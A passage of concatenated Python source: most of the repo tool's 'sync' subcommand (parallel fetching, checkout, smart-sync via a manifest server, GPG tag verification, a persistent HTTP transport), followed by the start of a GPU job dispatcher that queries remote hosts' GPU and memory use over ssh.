If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
PARALLEL_JOBS = 1
def _Options(self, p, show_smart=True):
try:
self.PARALLEL_JOBS = self.manifest.default.sync_j
except ManifestParseError:
pass
super()._Options(p)
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help='obsolete option (to be deleted in the future)')
p.add_option('--fail-fast',
dest='fail_fast', action='store_true',
help='stop syncing after first error is hit')
p.add_option('--force-sync',
dest='force_sync', action='store_true',
help="overwrite an existing git directory if it needs to "
"point to a different object directory. WARNING: this "
"may cause loss of data")
p.add_option('--force-remove-dirty',
dest='force_remove_dirty', action='store_true',
help="force remove projects with uncommitted modifications if "
"projects no longer exist in the manifest. "
"WARNING: this may cause loss of data")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('--no-manifest-update', '--nmu',
dest='mp_update', action='store_false', default='true',
help='use the existing manifest checkout as-is. '
'(do not update to the latest revision)')
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-v', '--verbose',
dest='output_mode', action='store_true',
help='show all sync output')
p.add_option('-q', '--quiet',
dest='output_mode', action='store_false',
help='only show errors')
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--clone-bundle', action='store_true',
help='enable use of /clone.bundle on HTTP/HTTPS')
p.add_option('--no-clone-bundle', dest='clone_bundle', action='store_false',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--use-superproject', action='store_true',
help='use the manifest superproject to sync projects')
p.add_option('--no-tags',
dest='tags', default=True, action='store_false',
help="don't fetch tags")
p.add_option('--optimized-fetch',
dest='optimized_fetch', action='store_true',
help='only fetch projects fixed to sha1 if revision does not exist locally')
p.add_option('--retry-fetches',
default=0, action='store', type='int',
help='number of times to retry fetches on transient errors')
p.add_option('--prune', dest='prune', action='store_true',
help='delete refs that no longer exist on the remote')
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from the latest known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='repo_verify', default=True, action='store_false',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _GetBranch(self):
"""Returns the branch name for getting the approved manifest."""
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
return branch
def _UpdateProjectsRevisionId(self, opt, args):
"""Update revisionId of every project with the SHA from superproject.
This function updates each project's revisionId with SHA from superproject.
It writes the updated manifest into a file and reloads the manifest from it.
Args:
opt: Program options returned from optparse. See _Options().
args: Arguments to pass to GetProjects. See the GetProjects
docstring for details.
Returns:
Returns path to the overriding manifest file.
"""
superproject = git_superproject.Superproject(self.manifest,
self.repodir,
quiet=opt.quiet)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
manifest_path = superproject.UpdateProjectsRevisionId(all_projects)
if not manifest_path:
print('error: Update of revsionId from superproject has failed',
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_path)
return manifest_path
def _FetchProjectList(self, opt, projects, sem, *args, **kwargs):
"""Main function of the fetch threads.
Delegates most of the work to _FetchHelper.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _FetchHelper. See the
_FetchHelper docstring for details.
"""
try:
for project in projects:
success = self._FetchHelper(opt, project, *args, **kwargs)
if not success and opt.fail_fast:
break
finally:
sem.release()
def _FetchHelper(self, opt, project, lock, fetched, pm, err_event,
clone_filter):
"""Fetch git objects for a single project.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
clone_filter: Filter for use in a partial clone.
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we unlock the lock if we locked it.
start = time.time()
success = False
buf = io.StringIO()
with lock:
pm.start(project.name)
try:
try:
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
verbose=opt.verbose,
output_redir=buf,
current_branch_only=opt.current_branch_only,
force_sync=opt.force_sync,
clone_bundle=opt.clone_bundle,
tags=opt.tags, archive=self.manifest.IsArchive,
optimized_fetch=opt.optimized_fetch,
retry_fetches=opt.retry_fetches,
prune=opt.prune,
clone_filter=clone_filter)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
output = buf.getvalue()
if opt.verbose and output:
pm.update(inc=0, msg=output.rstrip())
if not success:
err_event.set()
print('error: Cannot fetch %s from %s'
% (project.name, project.remote.url),
file=sys.stderr)
if opt.fail_fast:
raise _FetchError()
fetched.add(project.gitdir)
except _FetchError:
pass
except Exception as e:
print('error: Cannot fetch %s (%s: %s)'
% (project.name, type(e).__name__, str(e)), file=sys.stderr)
err_event.set()
raise
finally:
if not did_lock:
lock.acquire()
pm.finish(project.name)
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK,
start, finish, success)
return success
def _Fetch(self, projects, opt, err_event):
fetched = set()
lock = _threading.Lock()
pm = Progress('Fetching', len(projects))
objdir_project_map = dict()
for project in projects:
objdir_project_map.setdefault(project.objdir, []).append(project)
threads = set()
sem = _threading.Semaphore(self.jobs)
for project_list in objdir_project_map.values():
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.is_set() and opt.fail_fast:
break
sem.acquire()
kwargs = dict(opt=opt,
projects=project_list,
sem=sem,
lock=lock,
fetched=fetched,
pm=pm,
err_event=err_event,
clone_filter=self.manifest.CloneFilter)
if self.jobs > 1:
t = _threading.Thread(target=self._FetchProjectList,
kwargs=kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._FetchProjectList(**kwargs)
for t in threads:
t.join()
pm.end()
self._fetch_times.Save()
if not self.manifest.IsArchive:
self._GCProjects(projects, opt, err_event)
return fetched
def _CheckoutOne(self, opt, project):
"""Checkout work tree for one project
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to checkout.
Returns:
Whether the fetch was successful.
"""
start = time.time()
syncbuf = SyncBuffer(self.manifest.manifestProject.config,
detach_head=opt.detach_head)
success = False
try:
project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync)
success = syncbuf.Finish()
except Exception as e:
print('error: Cannot checkout %s: %s: %s' %
(project.name, type(e).__name__, str(e)),
file=sys.stderr)
raise
if not success:
print('error: Cannot checkout %s' % (project.name), file=sys.stderr)
finish = time.time()
return (success, project, start, finish)
def _Checkout(self, all_projects, opt, err_results):
"""Checkout projects listed in all_projects
Args:
all_projects: List of all projects that should be checked out.
opt: Program options returned from optparse. See _Options().
err_results: A list of strings, paths to git repos where checkout failed.
"""
ret = True
# Only checkout projects with worktrees.
all_projects = [x for x in all_projects if x.worktree]
pm = Progress('Checking out', len(all_projects))
def _ProcessResults(results):
for (success, project, start, finish) in results:
self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL,
start, finish, success)
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if not success:
err_results.append(project.relpath)
if opt.fail_fast:
return False
pm.update(msg=project.name)
return True
# NB: Multiprocessing is heavy, so don't spin it up for one job.
if len(all_projects) == 1 or opt.jobs == 1:
if not _ProcessResults(self._CheckoutOne(opt, x) for x in all_projects):
ret = False
else:
with multiprocessing.Pool(opt.jobs) as pool:
results = pool.imap_unordered(
functools.partial(self._CheckoutOne, opt),
all_projects,
chunksize=WORKER_BATCH_SIZE)
if not _ProcessResults(results):
ret = False
pool.close()
pm.end()
return ret and not err_results
def _GCProjects(self, projects, opt, err_event):
gc_gitdirs = {}
for project in projects:
# Make sure pruning never kicks in with shared projects.
if (not project.use_git_worktrees and
len(project.manifest.GetProjectsWithName(project.name)) > 1):
if not opt.quiet:
print('%s: Shared project %s found, disabling pruning.' %
(project.relpath, project.name))
if git_require((2, 7, 0)):
project.EnableRepositoryExtension('preciousObjects')
else:
# This isn't perfect, but it's the best we can do with old git.
print('%s: WARNING: shared projects are unreliable when using old '
'versions of git; please upgrade to git-2.7.0+.'
% (project.relpath,),
file=sys.stderr)
project.config.SetString('gc.pruneExpire', 'never')
gc_gitdirs[project.gitdir] = project.bare_git
if multiprocessing:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for bare_git in gc_gitdirs.values():
bare_git.gc('--auto')
return
config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
def GC(bare_git):
try:
try:
bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except Exception:
err_event.set()
raise
finally:
sem.release()
for bare_git in gc_gitdirs.values():
if err_event.is_set() and opt.fail_fast:
break
sem.acquire()
t = _threading.Thread(target=GC, args=(bare_git,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def UpdateProjectList(self, opt):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
with open(file_path, 'r') as fd:
old_project_paths = fd.read().split('\n')
# In reversed order, so subfolders are deleted before parent folder.
for path in sorted(old_project_paths, reverse=True):
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
gitdir = os.path.join(self.manifest.topdir, path, '.git')
if os.path.exists(gitdir):
project = Project(
manifest=self.manifest,
name=path,
remote=RemoteSpec('origin'),
gitdir=gitdir,
objdir=gitdir,
use_git_worktrees=os.path.isfile(gitdir),
worktree=os.path.join(self.manifest.topdir, path),
relpath=path,
revisionExpr='HEAD',
revisionId=None,
groups=None)
if not project.DeleteWorktree(
quiet=opt.quiet,
force=opt.force_remove_dirty):
return 1
new_project_paths.sort()
with open(file_path, 'w') as fd:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
return 0
def _SmartSyncSetup(self, opt, smart_sync_manifest_path):
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if '@' not in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
# .netrc file does not exist or could not be opened
pass
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
auth = info.authenticators(parse_result.hostname)
if auth:
username, _account, password = auth
else:
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
transport = PersistentTransport(manifest_server)
if manifest_server.startswith('persistent-'):
manifest_server = manifest_server[len('persistent-'):]
try:
server = xmlrpc.client.Server(manifest_server, transport=transport)
if opt.smart_sync:
branch = self._GetBranch()
if 'SYNC_TARGET' in os.environ:
target = os.environ['SYNC_TARGET']
[success, manifest_str] = server.GetApprovedManifest(branch, target)
elif ('TARGET_PRODUCT' in os.environ and
'TARGET_BUILD_VARIANT' in os.environ):
target = '%s-%s' % (os.environ['TARGET_PRODUCT'],
os.environ['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = os.path.basename(smart_sync_manifest_path)
try:
with open(smart_sync_manifest_path, 'w') as f:
f.write(manifest_str)
except IOError as e:
print('error: cannot write manifest to %s:\n%s'
% (smart_sync_manifest_path, e),
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
return manifest_name
def _UpdateManifestProject(self, opt, mp, manifest_name):
"""Fetch & update the local manifest project."""
if not opt.local_only:
start = time.time()
success = mp.Sync_NetworkHalf(quiet=opt.quiet, verbose=opt.verbose,
current_branch_only=opt.current_branch_only,
force_sync=opt.force_sync,
tags=opt.tags,
optimized_fetch=opt.optimized_fetch,
retry_fetches=opt.retry_fetches,
submodules=self.manifest.HasSubmodules,
clone_filter=self.manifest.CloneFilter)
finish = time.time()
self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK,
start, finish, success)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
start = time.time()
mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules)
clean = syncbuf.Finish()
self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL,
start, time.time(), clean)
if not clean:
sys.exit(1)
self._ReloadManifest(opt.manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
def ValidateOptions(self, opt, args):
if opt.force_broken:
print('warning: -f/--force-broken is now the default behavior, and the '
'options are deprecated', file=sys.stderr)
if opt.network_only and opt.detach_head:
self.OptionParser.error('cannot combine -n and -d')
if opt.network_only and opt.local_only:
self.OptionParser.error('cannot combine -n and -l')
if opt.manifest_name and opt.smart_sync:
self.OptionParser.error('cannot combine -m and -s')
if opt.manifest_name and opt.smart_tag:
self.OptionParser.error('cannot combine -m and -t')
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
self.OptionParser.error('-u and -p may only be combined with -s or -t')
if None in [opt.manifest_server_username, opt.manifest_server_password]:
self.OptionParser.error('both -u and -p must be given')
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) // 3)
opt.quiet = opt.output_mode is False
opt.verbose = opt.output_mode is True
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
smart_sync_manifest_path = os.path.join(
self.manifest.manifestProject.worktree, 'smart_sync_override.xml')
if opt.clone_bundle is None:
opt.clone_bundle = self.manifest.CloneBundle
if opt.smart_sync or opt.smart_tag:
manifest_name = self._SmartSyncSetup(opt, smart_sync_manifest_path)
else:
if os.path.isfile(smart_sync_manifest_path):
try:
platform_utils.remove(smart_sync_manifest_path)
except OSError as e:
print('error: failed to remove existing smart sync override manifest: %s' %
e, file=sys.stderr)
err_event = _threading.Event()
rp = self.manifest.repoProject
rp.PreSync()
cb = rp.CurrentBranch
if cb:
base = rp.GetBranch(cb).merge
if not base or not base.startswith('refs/heads/'):
print('warning: repo is not tracking a remote branch, so it will not '
'receive updates; run `repo init --repo-rev=stable` to fix.',
file=sys.stderr)
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.mp_update:
print('Skipping update of local manifest project.')
else:
self._UpdateManifestProject(opt, mp, manifest_name)
if (opt.use_superproject or
self.manifest.manifestProject.config.GetBoolean(
'repo.superproject')):
manifest_name = self._UpdateProjectsRevisionId(opt, args)
if self.gitc_manifest:
gitc_manifest_projects = self.GetProjects(args,
missing_ok=True)
gitc_projects = []
opened_projects = []
for project in gitc_manifest_projects:
if project.relpath in self.gitc_manifest.paths and \
self.gitc_manifest.paths[project.relpath].old_revision:
opened_projects.append(project.relpath)
else:
gitc_projects.append(project.relpath)
if not args:
gitc_projects = None
if gitc_projects != [] and not opt.local_only:
print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name)
manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name)
if manifest_name:
manifest.Override(manifest_name)
else:
manifest.Override(self.manifest.manifestFile)
gitc_utils.generate_gitc_manifest(self.gitc_manifest,
manifest,
gitc_projects)
print('GITC client successfully synced.')
# The opened projects need to be synced as normal, therefore we
# generate a new args list to represent the opened projects.
# TODO: make this more reliable -- if there's a project name/path overlap,
# this may choose the wrong project.
args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd())
for path in opened_projects]
if not args:
return
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
err_network_sync = False
err_update_projects = False
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt, err_event)
_PostRepoFetch(rp, opt.repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
if err_event.is_set():
print('\nerror: Exited sync due to fetch errors.\n', file=sys.stderr)
sys.exit(1)
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Stop us from non-stopped fetching actually-missing repos: If set of
# missing repos has not been changed from last fetch, we break.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt, err_event))
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.is_set():
err_network_sync = True
if opt.fail_fast:
print('\nerror: Exited sync due to fetch errors.\n'
'Local checkouts *not* updated. Resolve network issues & '
'retry.\n'
'`repo sync -l` will update some local checkouts.',
file=sys.stderr)
sys.exit(1)
if self.manifest.IsMirror or self.manifest.IsArchive:
# bail out now, we have no working tree
return
if self.UpdateProjectList(opt):
err_event.set()
err_update_projects = True
if opt.fail_fast:
print('\nerror: Local checkouts *not* updated.', file=sys.stderr)
sys.exit(1)
err_results = []
# NB: We don't exit here because this is the last step.
err_checkout = not self._Checkout(all_projects, opt, err_results)
if err_checkout:
err_event.set()
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.is_set():
print('\nerror: Unable to fully sync the tree.', file=sys.stderr)
if err_network_sync:
print('error: Downloading network changes failed.', file=sys.stderr)
if err_update_projects:
print('error: Updating local project lists failed.', file=sys.stderr)
if err_checkout:
print('error: Checking out local projects failed.', file=sys.stderr)
if err_results:
print('Failing repos:\n%s' % '\n'.join(err_results), file=sys.stderr)
print('Try re-running with "-j1 --fail-fast" to exit at the first error.',
file=sys.stderr)
sys.exit(1)
if not opt.quiet:
print('repo sync has finished successfully.')
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = Wrapper()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects:
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, repo_verify=True, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if not repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo."""',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir
env['GNUPGHOME'] = gpg_dir
cmd = [GIT, 'tag', '-v', cur]
result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
env=env, check=False)
if result.returncode:
print(file=sys.stderr)
print(result.stdout, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
self._times[name] = (a * t) + ((1 - a) * old)
def _Load(self):
if self._times is None:
try:
with open(self._path) as f:
self._times = json.load(f)
except (IOError, ValueError):
try:
platform_utils.remove(self._path)
except OSError:
pass
self._times = {}
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
with open(self._path, 'w') as f:
json.dump(self._times, f, indent=2)
except (IOError, TypeError):
try:
platform_utils.remove(self._path)
except OSError:
pass
# This is a replacement for xmlrpc.client.Transport using urllib2
# and supporting persistent-http[s]. It cannot change hosts from
# request to request like the normal transport, the real url
# is passed during initialization.
class PersistentTransport(xmlrpc.client.Transport):
def __init__(self, orig_host):
self.orig_host = orig_host
def request(self, host, handler, request_body, verbose=False):
with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy):
# Python doesn't understand cookies with the #HttpOnly_ prefix
# Since we're only using them for HTTP, copy the file temporarily,
# stripping those prefixes away.
if cookiefile:
tmpcookiefile = tempfile.NamedTemporaryFile(mode='w')
tmpcookiefile.write("# HTTP Cookie File")
try:
with open(cookiefile) as f:
for line in f:
if line.startswith("#HttpOnly_"):
line = line[len("#HttpOnly_"):]
tmpcookiefile.write(line)
tmpcookiefile.flush()
cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name)
try:
cookiejar.load()
except cookielib.LoadError:
cookiejar = cookielib.CookieJar()
finally:
tmpcookiefile.close()
else:
cookiejar = cookielib.CookieJar()
proxyhandler = urllib.request.ProxyHandler
if proxy:
proxyhandler = urllib.request.ProxyHandler({
"http": proxy,
"https": proxy})
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(cookiejar),
proxyhandler)
url = urllib.parse.urljoin(self.orig_host, handler)
parse_results = urllib.parse.urlparse(url)
scheme = parse_results.scheme
if scheme == 'persistent-http':
scheme = 'http'
if scheme == 'persistent-https':
# If we're proxying through persistent-https, use http. The
# proxy itself will do the https.
if proxy:
scheme = 'http'
else:
scheme = 'https'
# Parse out any authentication information using the base class
host, extra_headers, _ = self.get_host_info(parse_results.netloc)
url = urllib.parse.urlunparse((
scheme,
host,
parse_results.path,
parse_results.params,
parse_results.query,
parse_results.fragment))
request = urllib.request.Request(url, request_body)
if extra_headers is not None:
for (name, header) in extra_headers:
request.add_header(name, header)
request.add_header('Content-Type', 'text/xml')
try:
response = opener.open(request)
except urllib.error.HTTPError as e:
if e.code == 501:
# We may have been redirected through a login process
# but our POST turned into a GET. Retry.
response = opener.open(request)
else:
raise
p, u = xmlrpc.client.getparser()
while 1:
data = response.read(1024)
if not data:
break
p.feed(data)
p.close()
return u.close()
def close(self):
pass
|
dispatcher.py
|
from __future__ import unicode_literals
import subprocess
import time
import sys
import datetime
try:
import queue as queue
except ImportError:
import Queue as queue
from functools import partial
from random import shuffle, seed
import multiprocessing as mp
import threading
import os
import re
MAX_PARALLEL_JOBS = 4
"""
How often does a job tries to rerun a job if it failed
"""
MAX_RETRIES = 2
"""
At below what temperature is a gpu considered unused
"""
MAX_TEMPERATURE = 70
"""
How much time in seconds does a host gets reserved by a job on startup, before allowing other jobs to take the same host
"""
RESERVE_TIME_FOR_JOB_STARTUP = 60
"""
How long do we wait for the suitability check on the host before kicking out the host of the list
"""
HOST_SUITABILITY_TIMEOUT = 10
LOG_TARGETS = dict(
none=None,
stdout=sys.stdout,
stderr=sys.stderr,
file=2,
file_autorm=3, # automatically remove the logfile, if the job failed
)
UNIT_TO_GB = {
b'kB': 1e-6,
b'MB': 1e-3,
b'GB': 1
}
def _print_info(info):
print('[I]: '+info)
def _print_warning(err):
print('\033[93m[E]: ' + err + '\033[0m')
def _print_error(err):
print('\033[91m\033[1m[E]: ' + err + '\033[0m')
def _print_ok(info):
print('\033[92m[I]: ' + info + '\033[0m')
def time_stamped(fmt='%Y-%m-%d-%H-%M-%S.%f'):
return datetime.datetime.now().strftime(fmt)[:-3]
class TimeoutError(Exception):
pass
class RemoteError(Exception):
pass
class TimeoutCommand(object):
def __init__(self, cmd, logfile=None):
self.cmd = cmd
self.logfile = logfile
self.process = None
self.output = []
self.retcode = -1
def call(self, timeout=None):
def run():
self.process = subprocess.Popen(self.cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
p = self.process
with p.stdout:
#for line in iter(p.stdout.readline, b''):
for line in iter(p.stdout.readline, ''):
if self.logfile is not None:
try:
if sys.version_info[0] >= 3:
self.logfile.write(str(line, 'utf-8'))
else:
self.logfile.write(line)
self.logfile.flush()
except IOError as e:
print(e)
self.output = line
else:
self.output.append(line.strip())
p.wait()
self.retcode = p.returncode
thread = threading.Thread(target=run)
thread.start()
thread.join(timeout)
if thread.is_alive():
# timeout happened
try:
self.process.terminate()
thread.join()
except AttributeError:
pass
raise TimeoutError()
return self.retcode, self.output
def remote_exec(host, command, timeout=None, logfile=None):
"""Calls a command on a remote host via ssh
Parameters
----------
host : str
Hostname or address
command : str
Command to execute on host
timeout : int
Optional timeout for maximal running time in seconds. Set to None if not desired
logfile : filehandle
If set, all outputs from remotely executed command will be written to this file handle
Returns
----------
int
Return code of executed command on remote host
list
List of command output strings
"""
rc, output = TimeoutCommand(['ssh', host, command], logfile).call(timeout)
return rc, output
def query_gpu_users(host):
"""Queries current users of gpus on remote host
Parameters
----------
host : str
Hostname or address
Returns
----------
list
List of user names
"""
cmd = 'nvidia-smi --query-compute-apps=pid --format=csv,noheader | xargs ps -o user'
retcode, output = remote_exec(host, cmd)
if retcode != 0:
raise RemoteError('Could not query gpu info via nvidia-smi on %s'%host)
return output[1:]
def query_gpu_utilization(host):
"""Queries gpu utilization on remote host
Parameters
----------
host : str
Hostname or address
Returns
----------
list
List of float pair and integer (memory used in GB, total memory in GB, temperature in degree C).
The length of the list equals the number of gpus on the host
"""
cmd = 'nvidia-smi --query-gpu="memory.used,memory.total,temperature.gpu" --format=csv,noheader,nounits'
retcode, output = remote_exec(host, cmd, timeout=HOST_SUITABILITY_TIMEOUT)
if retcode != 0:
raise RemoteError('Could not query gpu info via nvidia-smi on %s'%host)
# remove potential entries, that do not adhere to the format \d+, \d+, \d+
pattern = re.compile('\d+, \d+, \d+')
i = 0
while i < len(output):
if pattern.match(output[i]) is None:
output.pop(i)
else:
i += 1
num_gpus = len(output)
mem_util = []
for gpu in output:
mem_used, mem_total, temp = gpu.split(b', ')
mem_used = int(mem_used)*UNIT_TO_GB[b'MB']
mem_total = int(mem_total)*UNIT_TO_GB[b'MB']
mem_util.append((mem_used, mem_total, int(temp)))
return mem_util
def query_cpu_utilization(host):
"""Queries cpu utilization and available memory on remote host
Parameters
----------
host : str
Hostname or address
Returns
----------
float
cpu utilization (fraction),
float
available memory in GB
float
total memory in GB
"""
cmd = "echo \"$(mpstat | grep all) $(cat /proc/meminfo | grep -E 'MemTotal|MemAvailable')\""
retcode, output = remote_exec(host, cmd, timeout=HOST_SUITABILITY_TIMEOUT)
if retcode != 0:
raise RemoteError('Could not query cpu and memory utilization on %s'%host)
cpu_util = []
entries = output[0].split()
cpu = float(entries[3])
totalmem = int(entries[14])
unit = entries[15]
totalmem = totalmem*UNIT_TO_GB[unit]
entries = output[1].split()
mem = int(entries[1])
unit = entries[2]
mem = mem*UNIT_TO_GB[unit]
return cpu/100., mem, totalmem
def host_satisfies_conditions(host,
required_gpus, required_gpu_mem,
required_cpu_mem):
